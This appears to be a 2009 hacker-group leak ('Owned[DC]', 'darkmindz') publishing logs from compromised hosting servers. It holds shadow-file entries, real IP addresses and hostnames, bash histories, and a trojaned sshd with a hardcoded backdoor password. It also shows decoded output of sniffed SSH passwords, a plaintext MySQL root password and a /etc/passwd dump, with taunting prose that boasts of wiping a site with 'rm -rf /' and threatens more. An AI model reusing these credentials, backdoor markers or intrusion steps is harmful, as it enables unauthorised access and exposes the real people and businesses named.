lvconven:_censored_$Pi1JPn.1OrKH5JaI5GjPf0:14055:0:99999:7:::
|
||
lvtrades:_censored_$dr.bC2FHXaV6QITM0lmbn1:14055:0:99999:7:::
|
||
nyctrade:_censored_$dAeNUEisO8nI1GxoDK7Bq0:14055:0:99999:7:::
|
||
services:_censored_$/MGwtjcf.Ru7o7y/HDd6P/:14068:0:99999:7:::
|
||
worships:_censored_$DD7lYOZiW2VfGQARqj4Nw/:14070:0:99999:7:::
|
||
eworship:_censored_$/RA2I.4drunr/Q5sEk/gA1:14070:0:99999:7:::
|
||
aemotors:_censored_$yHBjKMyrCFRYaGnSuAc420:14083:0:99999:7:::
|
||
workfrom:_censored_$8whIbBBBjYzZxgDDDuMde.:14091:0:99999:7:::
|
||
megaspel:_censored_$aO1t9Wneps4O6nDXFn.84/:14093:0:99999:7:::
|
||
espel:_censored_$PNoLG3/nFppUcjJB7Ndkc1:14093:0:99999:7:::
|
||
dyna:_censored_$oeAPTO2pNcYr7jguVfS.o0:14097:0:99999:7:::
|
||
niklas:_censored_$MLPe0p9S4Wz.ficqPiWE3.:14098:0:99999:7:::
|
||
glendale:_censored_$36WbIrHoaY6p.wQHDMKSI/:14112:0:99999:7:::
|
||
theworkf:_censored_$k9UTdl9Xszol3vXe8XJex/:14113:0:99999:7:::
|
||
missreso:_censored_$cMQPqmDGUCrI5GCTJ95IW1:14114:0:99999:7:::
|
||
theletro:_censored_$uSdV14r/ad2VSUSQN076J1:14137:0:99999:7:::
|
||
simobilg:_censored_$lgR0ZcRPsacgrXN0CyTph/:14163:0:99999:7:::
|
||
concert:_censored_$u78BVeFn/9dqijD5FxFn30:14167:0:99999:7:::
|
||
worldsbe:_censored_$KhYsNIhpV/9MpNLsJ7KkD1:14176:0:99999:7:::
|
||
x1qo0xmz:_censored_$35pb2Tt3NF7mcdwa8ij0S/:14210:0:99999:7:::
|
||
american:_censored_$f64FdDQZShu/QPCT01cig.:14212:0:99999:7:::
|
||
firstrat:_censored_$Cg447uD7Pf1PSfs03LyFI0:14217:0:99999:7:::
|
||
xq05vz73:_censored_$H96kS5lH6gbiK3ShSPwJG.:14219:0:99999:7:::
|
||
imsauto:_censored_$18x.Al7E/c8nKVG5w4ge90:14225:0:99999:7:::
|
||
headwayp:_censored_$5.CQnCYJzlFnw10dJB1fo/:14253:0:99999:7:::
|
||
performa:_censored_$RXFC0.Y9sd19TL59ulzBy0:14248:0:99999:7:::
|
||
snowboar:_censored_$S0pOHKtr37Qp283oBChtz0:14246:0:99999:7:::
|
||
importeu:_censored_$0vHEmwZW2WImMY8i961N7.:14260:0:99999:7:::
|
||
holyschn:_censored_$yyYCxFr6MAeXOFS4uGZxE1:14262:0:99999:7:::
|
||
rivercit:_censored_$JhMlSLJOJxGB84SdIX9VL0:14271:0:99999:7:::
|
||
perform:_censored_$MwABPul6js/dDkESj3NCa/:14334:0:99999:7:::
|
||
sco:_censored_$mD1J7V6/XgnGKexigg7ZQ/:14342:0:99999:7:::
|
||
austinar:_censored_$kwPledBlp5.5FRj7TCsXF.:14349:0:99999:7:::
|
||
arlingto:_censored_$HOPfqdVPLDjcKYOYXBssZ.:14350:0:99999:7:::
|
||
albuquer:_censored_$IIfpFNji/HFkgySU9QPyZ.:14350:0:99999:7:::
|
||
jvconcer:_censored_$Up603l0cXWF0BisBD010v/:14352:0:99999:7:::
|
||
sanjosec:_censored_$6lZMqhYCRgu07TQSTca1D.:14352:0:99999:7:::
|
||
sdconcer:_censored_$jsdhywYTV6.yqzfh7IApB1:14352:0:99999:7:::
|
||
bukemark:_censored_$giCqM37r16fagpVb.7SlB/:14363:0:99999:7:::
|
||
laconcer:_censored_$WBI4s4H3O7Slpsk7zrZpj.:14366:0:99999:7:::
|
||
dforce:_censored_$fjjNVrQw8LPQCDcgXRUkc1:14392:0:99999:7:::
|
||
|
||
Owned[DC]:[/backup]# cat ~/.bash_history
|
||
ssh 64.191.54.229 -l butts
|
||
#1244614734
|
||
ssh 64.191.54.229 -l butts
|
||
#1244651529
|
||
ssh butts@64.191.54.229
|
||
#1244644856
|
||
ssh 66.96.220.213 -l makosolutions
|
||
#1244644866
|
||
ssh 66.96.220.213 -l makosolutions -p 2222
|
||
#1244645088
|
||
ssh 66.96.220.213 -l mako -p 2222
|
||
#1244650823
|
||
top -c
|
||
#1244651468
|
||
ssh 66.96.220.213
|
||
#1244651606
|
||
ssh 66.96.220.213 -l makosolutions
|
||
#1244659374
|
||
ifconfig | grep 67.225.142.98
|
||
#1244659384
|
||
ssh -l butts server.holeinthewallhosting.com
|
||
#1244659474
|
||
nmap server.holeinthewallhosting.com
|
||
#1244659875
|
||
ssh -l butts server.holeinthewallhosting.com
|
||
#1244659891
|
||
ssh -l butts 64.191.54.229
|
||
#1244677757
|
||
ssh -l makosolutions 66.96.220.213
|
||
#1244810932
|
||
exit
|
||
#1244944507
|
||
ssh 64.191.54.229 -l butts
|
||
#1244971944
|
||
ssh -l butts 64.191.54.229
|
||
#1245004682
|
||
ssh 64.191.116.203
|
||
#1245013655
|
||
exit
|
||
#1245067142
|
||
ssh 66.96.220.213
|
||
#1245062070
|
||
ssh 66.96.220.213
|
||
#1245074394
|
||
ssh 64.191.116.203
|
||
#1245076716
|
||
exit
|
||
#1245058974
|
||
ssh 66.96.220.213
|
||
#1245082594
|
||
ssh 64.191.116.203
|
||
#1245141381
|
||
grep nukelar.reality-matrix.org /etc/trueuserdomains
|
||
#1245141388
|
||
grep nukelar.reality-matrix.org /etc/userdomains
|
||
#1245141593
|
||
ssh 64.191.116.203
|
||
#1245161918
|
||
ssh 66.96.220.213
|
||
#1245161939
|
||
telnet 66.96.220.213 22
|
||
#1245161953
|
||
telnet 66.96.220.213 53
|
||
#1245161969
|
||
nmap 66.96.220.213
|
||
#1245162042
|
||
ssh 66.96.220.213 -p 80
|
||
#1245147550
|
||
ssh 64.191.116.203
|
||
#1244659875
|
||
ssh -l butts server.holeinthewallhosting.com
|
||
#1244659891
|
||
ssh -l butts 64.191.54.229
|
||
#1244677757
|
||
ssh -l makosolutions 66.96.220.213 // infosec.org.uk
|
||
#1244810932
|
||
exit
|
||
#1244944507
|
||
ssh 64.191.54.229 -l butts
|
||
#1244971944
|
||
ssh -l butts 64.191.54.229
|
||
#1245004682
|
||
ssh 64.191.116.203
|
||
#1245013655
|
||
exit
|
||
#1245067142
|
||
ssh 66.96.220.213
|
||
#1245062070
|
||
ssh 66.96.220.213
|
||
#1245074394
|
||
ssh 64.191.116.203
|
||
#1245076716
|
||
exit
|
||
#1245058974
|
||
ssh 66.96.220.213
|
||
#1245082594
|
||
ssh 64.191.116.203
|
||
#1245141381
|
||
grep nukelar.reality-matrix.org /etc/trueuserdomains
|
||
#1245141388
|
||
grep nukelar.reality-matrix.org /etc/userdomains
|
||
#1245141593
|
||
ssh 64.191.116.203
|
||
#1245161918
|
||
ssh 66.96.220.213
|
||
#1245161939
|
||
telnet 66.96.220.213 22
|
||
#1245161953
|
||
telnet 66.96.220.213 53
|
||
#1245161969
|
||
nmap 66.96.220.213
|
||
#1245162042
|
||
ssh 66.96.220.213 -p 80
|
||
#1245147550
|
||
ssh 64.191.116.203
|
||
#1245184460
|
||
ssh 66.96.220.213
|
||
#1245199770
|
||
ssh -l makosolutions 66.96.220.213
|
||
#1245318670
|
||
vi /etc/csf/csf.denyip
|
||
#1245318687
|
||
ssh 66.96.220.213
|
||
#1245318707
|
||
ssh root@66.96.220.213
|
||
#1245318749
|
||
ssh mako@66.96.220.213 -p2222
|
||
#1245318770
|
||
ssh mako@66.96.220.213 -p 2222
|
||
#1245318842
|
||
ssh mako@66.96.220.213 -p2222
|
||
#1245316906
|
||
ssh 66.7.198.124
|
||
#1245317031
|
||
ssh 66.7.198.124
|
||
#1245317159
|
||
ssh 66.96.220.213
|
||
#1245318179
|
||
ssh 66.96.220.213
|
||
#1245319038
|
||
ssh 67.225.159.152
|
||
#1245319073
|
||
ssh 67.225.159.152 -p22
|
||
#1245319077
|
||
ssh 67.225.159.152 -p 22
|
||
.
|
||
.
|
||
.
|
||
csf -l | grep 66.96.211.181
|
||
#1245999632
|
||
apf
|
||
#1246000060
|
||
ssh 66.96.211.181 -l root
|
||
#1246000637
|
||
grep 66.96.211.181 /var/log/messages
|
||
#1246002631
|
||
cat /usr/local/psa/version
|
||
#1246002640
|
||
ls /usr/local/psa/version
|
||
#1246015247
|
||
ls /usr/local/psa/version
|
||
#1245998530
|
||
ssh 64.191.72.85
|
||
#1245998556
|
||
telnet 64.191.72.85 25
|
||
#1245998595
|
||
vzlist -a
|
||
#1246001328
|
||
ssh 64.191.72.85
|
||
|
||
Owned[DC]:[/backup]# df -h
|
||
Filesystem Size Used Avail Use% Mounted on
|
||
/dev/sda7 2.0G 426M 1.5G 23% /
|
||
/dev/sdb1 147G 61G 79G 44% /backup
|
||
/dev/sda1 1012M 46M 915M 5% /boot
|
||
none 2.0G 0 2.0G 0% /dev/shm
|
||
/dev/sda8 121G 32G 83G 28% /home
|
||
/dev/sda6 2.0G 37M 1.9G 2% /tmp
|
||
/dev/sda2 9.9G 5.6G 3.9G 60% /usr
|
||
/dev/sda5 9.9G 2.1G 7.3G 23% /var
|
||
/tmp 2.0G 37M 1.9G 2% /var/tmp
|
||
Owned[DC]:[/backup]#
|
||
|
||
Owned[DC]:[/etc/pam.d]# cat sshd
|
||
#%PAM-1.0
|
||
auth required pam_stack.so service=system-auth
|
||
auth required pam_nologin.so
|
||
account required pam_stack.so service=system-auth
|
||
password required pam_stack.so service=system-auth
|
||
session required pam_stack.so service=system-auth
|
||
session required pam_loginuid.so
|
||
|
||
auth required pam_shells.so
|
||
|
||
Owned[DC]:[/var/run]# hostname
|
||
puma.makosolutions.net
|
||
Owned[DC]:[/var/run]#
|
||
|
||
Owned[DC]:[~]# lsof -i TCP:22
|
||
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
|
||
sshd 17433 root 3u IPv6 791605626 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
|
||
sshd 17441 makos2 3u IPv6 791605626 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
|
||
sshd 21409 root 3u IPv6 791273811 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
|
||
sshd 21412 makos2 3u IPv6 791273811 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
|
||
sshd 26799 root 3u IPv6 791290938 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
|
||
sshd 26806 makos2 3u IPv6 791290938 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
|
||
ssh 26887 root 3u IPv4 791291132 TCP puma.makosolutions.net:42625->serv.localhost:ssh (ESTABLISHED)
|
||
sshd 29596 root 3u IPv6 791533593 TCP puma.makosolutions.net:ssh->188.51.85.13:34957 (ESTABLISHED)
|
||
// RoMeO logged in just before the rm -rf / of makosolutions.com
|
||
sshd 30850 root 3u IPv6 783032196 TCP *:ssh (LISTEN)
|
||
|
||
|
||
|
||
_______ _______ ________
|
||
\ _ \ ___ __\ _ \ / _____/
|
||
/ /_\ \\ \/ / /_\ \/ __ \
|
||
\ \_/ \> <\ \_/ \ |__\ \
|
||
\_____ /__/\_ \\_____ /\_____ /
|
||
\/ \/ \/ \/
|
||
.__ .__ .__ __ .__ .__ .__
|
||
| |__ ____ | | ____ |__| _____/ |_| |__ ______ _ _______ | | | |
|
||
| | \ / _ \| | _/ __ \| |/ \ __\ | \_/ __ \ \/ \/ /\__ \ | | | |
|
||
| Y ( <_> ) |_\ ___/| | | \ | | Y \ ___/\ / / __ \| |_| |__
|
||
|___| /\____/|____/\___ >__|___| /__| |___| /\___ >\/\_/ (____ /____/____/
|
||
\/ \/ \/ \/ \/ \/
|
||
.__ __ .__
|
||
| |__ ____ _______/ |_|__| ____ ____
|
||
| | \ / _ \/ ___/\ __\ |/ \ / ___\ ______
|
||
| Y ( <_> )___ \ | | | | | \/ /_/ > /_____/
|
||
|___| /\____/____ > |__| |__|___| /\___ /
|
||
\/ \/ \//_____/
|
||
__________ _________
|
||
\______ \_______ ____ / _____/ ____ ____
|
||
| ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
|
||
| | | | \( <_> ) \ ___/\ \___
|
||
|____| |__| \____/_______ /\___ >\___ >
|
||
\/ \/ \/
|
||
|
||
|
||
64.191.54.229 0x3aownt:DlE46Y8KpH
|
||
+----------------------------[ Owned ]----------------------------+
|
||
| Hack everyone you can and then hack some more |
|
||
| Owned[DC] v2 |
|
||
| _______ . _______ . _______ |
|
||
| Get in as anonymous, Leave with no trace. |
|
||
| |
|
||
+-----------------------------------------------------------------+
|
||
[ Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 i686 ]
|
||
|
||
11:12:13 up 78 days, 17:02, 0 users, load average: 1.73, 2.17, 2.23
|
||
mrich pts/0 75-28-177-133.li Thu Jun 25 22:40 - 22:47 (00:06)
|
||
jayzer pts/1 cpe-76-183-78-13 Thu Jun 25 00:45 - 00:49 (00:04)
|
||
fmystic pts/1 cpe-71-67-100-61 Wed Jun 24 23:27 - 00:14 (00:46)
|
||
butts pts/0 puma.makosolutio Wed Jun 24 21:47 - 02:54 (05:07)
|
||
bwc05 pts/1 host-136-245.flt Wed Jun 24 00:18 - 00:18 (00:00)
|
||
|
||
wtmp begins Wed Apr 29 04:10:02 2009
|
||
root@server [~]#
|
||
|
||
|
||
root@server [~]# lsof -i -n | grep ssh
|
||
sshd 13173 root 3u IPv6 496962909 TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
|
||
sshd 13176 hsp 3u IPv6 496962909 TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
|
||
sshd 13285 root 3u IPv6 496964091 TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
|
||
sshd 13287 stephenm 3u IPv6 496964091 TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
|
||
sshd 13287 stephenm 7u IPv4 505107114 TCP 64.191.54.229:53259->192.168.1.121:icslap (SYN_SENT)
|
||
sshd 13287 stephenm 8u IPv4 505106277 TCP 64.191.54.229:38749->192.121.86.4:http (SYN_SENT)
|
||
sshd 30096 root 3u IPv6 485663697 TCP *:ssh (LISTEN)
|
||
root@server [~]#
|
||
|
||
|
||
root@server [/var/run]# gcc -o decode decode.c
|
||
͏Іʵroot@server [/var/run]# ./decode ssh.old
|
||
HOOKIN: falados:$.lWKq._censored_
|
||
HOOKIN: smithah:_censored_
|
||
.
|
||
.
|
||
.
|
||
HOOKIN: karsh:vnm_censored_
|
||
HOOKIN: karsh:vnm_censored_
|
||
HOOKIN: smithah:Coverfir_censored_
|
||
HOOKIN: karsh:vn_censored_
|
||
HOOKIN: mrich:t23_censored_
|
||
root@server [/var/run]#
|
||
|
||
root@server [/var/run]# hostname
|
||
server.holeinthewallhosting.net
|
||
root@server [/var/run]# uname -a
|
||
Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 #1 SMP Tue Aug 5 07:41:53 EDT 2008 i686 i686 i386 GNU/Linux
|
||
root@server [/var/run]# date
|
||
Fri Jun 26 11:16:32 CDT 2009
|
||
root@server [/var/run]# ifconfig -a
|
||
eth0 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.54.229 Bcast:64.191.54.239 Mask:255.255.255.240
|
||
inet6 addr: fe80::219:d1ff:fefb:459b/64 Scope:Link
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
RX packets:739777531 errors:0 dropped:0 overruns:0 frame:0
|
||
TX packets:970111216 errors:0 dropped:0 overruns:0 carrier:0
|
||
collisions:0 txqueuelen:1000
|
||
RX bytes:587506583 (560.2 MiB) TX bytes:4170982921 (3.8 GiB)
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:1 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.54.230 Bcast:64.191.54.255 Mask:255.255.255.0
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:2 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.54.231 Bcast:64.191.54.255 Mask:255.255.255.0
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:3 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.54.232 Bcast:64.191.54.255 Mask:255.255.255.0
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:4 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.54.233 Bcast:64.191.54.255 Mask:255.255.255.0
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:5 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.36.197 Bcast:64.191.36.207 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:6 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.36.198 Bcast:64.191.36.207 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:7 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.36.199 Bcast:64.191.36.207 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:8 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.36.200 Bcast:64.191.36.207 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:9 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.36.201 Bcast:64.191.36.207 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:10 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.36.202 Bcast:64.191.36.207 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:11 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.36.203 Bcast:64.191.36.207 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:12 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.36.204 Bcast:64.191.36.207 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:13 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.36.205 Bcast:64.191.36.207 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth0:14 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
|
||
inet addr:64.191.36.206 Bcast:64.191.36.207 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:217 Base address:0x2000
|
||
|
||
eth1 Link encap:Ethernet HWaddr 00:50:04:6F:DA:43
|
||
BROADCAST MULTICAST MTU:1500 Metric:1
|
||
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
|
||
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
|
||
collisions:0 txqueuelen:1000
|
||
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
||
Interrupt:217 Base address:0x8000
|
||
|
||
lo Link encap:Local Loopback
|
||
inet addr:127.0.0.1 Mask:255.0.0.0
|
||
inet6 addr: ::1/128 Scope:Host
|
||
UP LOOPBACK RUNNING MTU:16436 Metric:1
|
||
RX packets:35636410 errors:0 dropped:0 overruns:0 frame:0
|
||
TX packets:35636410 errors:0 dropped:0 overruns:0 carrier:0
|
||
collisions:0 txqueuelen:0
|
||
RX bytes:1453567506 (1.3 GiB) TX bytes:1453567506 (1.3 GiB)
|
||
|
||
sit0 Link encap:IPv6-in-IPv4
|
||
NOARP MTU:1480 Metric:1
|
||
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
|
||
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
|
||
collisions:0 txqueuelen:0
|
||
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
||
|
||
root@server [/var/run]#
|
||
|
||
|
||
root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 DlE46Y8KpH
|
||
Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
|
||
Rhosts authentication refused for %.100s: bad modes for %.200s
|
||
Server has been configured to ignore %.100s.
|
||
Accepted host %s ip %s client_user %s server_user %s
|
||
HOOKIN: %s:%s
|
||
DlE46Y8KpH
|
||
root@server [/var/run]#
|
||
|
||
root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 0x3
|
||
check_key_in_hostfiles: key %s for %s
|
||
auth1.c
|
||
sending challenge '%s'
|
||
ruser %.100s
|
||
do_authloop: BN_new failed
|
||
0x3aownt
|
||
|
||
root@server [~]# cat .my.cnf
|
||
[client]
|
||
user="root"
|
||
pass=",a5.z_censored_"
|
||
root@server [~]#
|
||
|
||
root@server [/tmp]# cd /var/run/
|
||
root@server [/var/run]# ls
|
||
./ couriersslcache dbus/ mdmpd/ pm/ saslauthd/ tailwatchd.pid
|
||
../ cpanellogd.pid eximstats/ messagebus.pid pop3d.pid screen/ upcp.pid
|
||
acpid.socket= cpdavd.pid ftpd.sock= named/ pop3d.pid.lock sdp= utmp
|
||
audispd_events= cphulkd_detector.pid haldaemon.pid named.pid@ pop3d-ssl.pid setrans/ winbindd/
|
||
auditd.pid cphulkd_processor.pid imapd.pid netreport/ pop3d-ssl.pid.lock setroubleshoot/ wpa_supplicant/
|
||
autofs.fifo-misc| cphulkd.sock= imapd.pid.lock NetworkManager/ ppp/ spamd.pid
|
||
autofs.fifo-net| cpsrvd.pid imapd-ssl.pid nscd/ pure-authd.pid sshd.pid
|
||
avahi-daemon/ crond.pid imapd-ssl.pid.lock pcscd.comm= pure-ftpd/ ssh.old
|
||
chkservd/ cups/ klogd.pid pcscd.pid pure-ftpd.pid sudo/
|
||
console/ cupsd.pid mdadm/ pcscd.pub rpc.statd.pid syslogd.pid
|
||
root@server [/var/run]# cd screen/
|
||
root@server [/var/run/screen]# ls
|
||
./ ../ S-root/
|
||
root@server [/var/run/screen]# cd S-root/
|
||
root@server [/var/run/screen/S-root]# ls
|
||
./ ../ 13472.pts-0.server|
|
||
root@server [/var/run/screen/S-root]# cat 13472.pts-0.server
|
||
|
||
|
||
root@server [/var/run/screen/S-root]# ls
|
||
./ ../ 13472.pts-0.server|
|
||
root@server [/var/run/screen/S-root]# cd ..
|
||
root@server [/var/run/screen]# ls
|
||
./ ../ S-root/
|
||
root@server [/var/run/screen]# ps -aux | grep -r screen
|
||
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
|
||
root 25085 0.0 0.0 3920 700 pts/1 S+ 11:27 0:00 grep -r screen
|
||
root@server [/var/run/screen]# ps -aux | grep -i screen
|
||
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
|
||
root 13472 0.0 0.0 5056 1064 ? Ss Jun10 0:00 SCREEN
|
||
root 25147 0.0 0.0 3920 680 pts/1 R+ 11:27 0:00 grep -i screen
|
||
root@server [/var/run/screen]#
|
||
|
||
|
||
_______ ________________
|
||
\ _ \ ___ __\ _ \______ \
|
||
/ /_\ \\ \/ / /_\ \ / /
|
||
\ \_/ \> <\ \_/ \/ /
|
||
\_____ /__/\_ \\_____ /____/
|
||
\/ \/ \/
|
||
.___ __ .__ .___
|
||
__| _/____ _______| | __ _____ |__| ____ __| _/_______
|
||
/ __ |\__ \\_ __ \ |/ // \| |/ \ / __ |\___ / ______
|
||
/ /_/ | / __ \| | \/ <| Y Y \ | | \/ /_/ | / / /_____/
|
||
\____ |(____ /__| |__|_ \__|_| /__|___| /\____ |/_____ \
|
||
\/ \/ \/ \/ \/ \/ \/
|
||
____________ .________
|
||
_________/ ____\ _ \ | ____/
|
||
\___ /\ __\/ /_\ \ |____ \
|
||
/ / | | \ \_/ \/ \
|
||
/_____ \ |__| \_____ /______ /
|
||
\/ \/ \/
|
||
|
||
|
||
|
|
||
\ / _\/_
|
||
darkmindz .-'-. //o\ _\/_
|
||
-- / \ -- | /o\\
|
||
^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
|
||
We eat the night, we drink the time |
|
||
Make our dreams come true
|
||
And hungry eyes are passing by
|
||
On streets we call the zoo
|
||
|
||
Darkmindz.com was just another "haxor" AKA idiot breeding ground forum run by
|
||
the infamous saudi named RoMeO. Fortunetly due to the recent events RoMeO
|
||
decided to kill his site and handle because he was sloppy & cocky enough to link
|
||
his anti-sec activities with his public internet "life". This has spared us the
|
||
trouble of needing to rm -rf /* his shit, so thx RoMeO, hope we can be friends.
|
||
We didn't want a good hax.log to go to waste so we decided to publish darkmindz
|
||
anyways.
|
||
|
||
RoMeO is a blackhat wannabe and gave us good lulz with astalavista, props to
|
||
that, but who the fuck is/was ssanz anyway and what's the point of spreading
|
||
anti-sec propaganda via imageshack? You can't enjoy the benefits of a blackhat
|
||
and run some retarded haxor forum at the same time pal, good to see that you
|
||
realized that. But in any case if you decide to put your shitty forum online
|
||
again, you will be rm'ed.
|
||
|
||
Here's what we found in darkmindz land.
|
||
|
||
root@www.darkmindz.com's password:
|
||
Last login: Sat May 23 03:39:06 2009 from cpe-76-175-20-182.socal.res.rr.com
|
||
ALERT! You are entering a secured area! Your IP and login information
|
||
have been recorded. System administration has been notified.
|
||
This system is restricted to authorized access only. All activities on
|
||
this system are recorded and logged. Unauthorized access will be fully
|
||
investigated and reported to the appropriate law enforcement agencies.
|
||
|
||
root@server2:~[root@server2 ~]# uname -a; id
|
||
Linux server2.hr-development.net 2.6.27.10-grsec #1 SMP Fri May 15 21:34:11 PDT
|
||
2009 x86_64 x86_64 x86_64 GNU/Linux
|
||
uid=0(root) gid=0(root)
|
||
groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
|
||
root@server2:~[root@server2 ~]# #who up in this mother fucker
|
||
root@server2:~[root@server2 ~]# cat /etc/passwd /etc/shadow
|
||
root:x:0:0:root:/root:/bin/bash
|
||
bin:x:1:1:bin:/bin:/sbin/nologin
|
||
daemon:x:2:2:daemon:/sbin:/sbin/nologin
|
||
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
|
||
halt:x:7:0:halt:/sbin:/sbin/halt
|
||
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
|
||
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
|
||
nobody:x:99:99:Nobody:/:/sbin/nologin
|
||
dbus:x:81:81:System message bus:/:/sbin/nologin
|
||
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
|
||
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
|
||
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
|
||
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
|
||
pcap:x:77:77::/var/arpwatch:/sbin/nologin
|
||
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
|
||
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
|
||
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
|
||
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
|
||
|
||
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
|
||
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
|
||
named:x:25:25:Named:/var/named:/sbin/nologin
|
||
apache:x:100:500::/var/www:/bin/false
|
||
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
|
||
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
|
||
webapps:x:500:501::/var/www/html:/bin/bash
|
||
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
|
||
dovecot:x:104:104::/home/dovecot:/bin/bash
|
||
admin:x:501:502::/home/admin:/bin/bash
|
||
hrdev:x:502:503::/home/hrdev:/bin/false
|
||
keytraderz:x:504:505::/home/keytraderz:/bin/false
|
||
yourkicks:x:507:508::/home/yourkicks:/bin/false
|
||
aaa:x:508:509::/home/aaa:/bin/false
|
||
beyond:x:509:510::/home/beyond:/bin/false
|
||
hotglow:x:510:511::/home/hotglow:/bin/false
|
||
wheelglow:x:512:513::/home/wheelglow:/bin/false
|
||
